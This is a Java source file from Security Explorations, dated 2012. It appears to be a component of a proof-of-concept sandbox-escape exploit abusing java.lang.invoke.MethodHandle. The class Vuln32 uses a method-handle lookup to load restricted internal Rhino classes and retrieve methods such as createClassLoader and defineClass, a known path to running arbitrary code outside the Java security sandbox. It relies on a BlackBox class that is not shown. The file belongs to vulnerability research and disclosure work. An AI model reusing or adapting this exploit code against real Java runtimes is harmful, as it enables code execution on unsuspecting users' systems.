/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* java.lang.invoke.MethodHandle                                              */
/* the possibility to call invokeExact from a system wrapper method           */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.lang.invoke.*;

public class Vuln32 {
 private static MethodHandles.Lookup plookup=MethodHandles.lookup();

 static Class load_class(String name) throws Throwable {
  Class c=Class.forName("java.lang.Class");

  Class ctab[]=new Class[1];
  ctab[0]=Class.forName("java.lang.String");

  MethodType desc=MethodType.methodType(c,ctab);

  MethodHandle forName_mh=plookup.findStatic(c,"forName",desc);

  Object args[]=new Object[1];
  args[0]=name;

  return (Class)forName_mh.invokeWithArguments(args);
 }

 static Method get_method(Class clazz,String name,Class ctab[]) throws Throwable {
  Class c=Class.forName("java.lang.Class");

  MethodType desc=MethodType.methodType((new Method[0]).getClass(),new Class[0]);

  MethodHandle getMethods_mh=plookup.findVirtual(c,"getDeclaredMethods",desc);

  Object args[]=new Object[1];
  args[0]=clazz;
  
  Method mtab[]=(Method[])getMethods_mh.invokeWithArguments(args);

  Method res=null;

  for(int i=0;i<mtab.length;i++) {
   Method m=mtab[i];

   if (!(m.getName().equals(name))) continue;

   Class ptab[]=m.getParameterTypes();

   int cnt=0;

   for(int j=0;j<ctab.length;j++) {
    String n1=ctab[j].getName();
    String n2=ptab[j].getName();

    if (n1.equals(n2)) cnt++;
   }

   if (ctab.length==cnt) {
    res=m;
    break;
   } 
  }

  return res;
 }

 public static void get_classes() throws Throwable {
  BlackBox.Context_class=load_class("sun.org.mozilla.javascript.internal.Context");
  BlackBox.DefiningClassLoader_class=load_class("sun.org.mozilla.javascript.internal.DefiningClassLoader");
 }

 public static void get_methods() throws Throwable {
  BlackBox.enter_m=get_method(BlackBox.Context_class,"enter",new Class[0]);

  Class ctab[]=new Class[1];
  ctab[0]=Class.forName("java.lang.ClassLoader");

  BlackBox.createClassLoader_m=get_method(BlackBox.Context_class,"createClassLoader",ctab);

  ctab=new Class[2];
  ctab[0]=Class.forName("java.lang.String");
  ctab[1]=(new byte[0]).getClass();

  BlackBox.defineClass_m=Vuln32.get_method(BlackBox.DefiningClassLoader_class,"defineClass",ctab);
 }

}
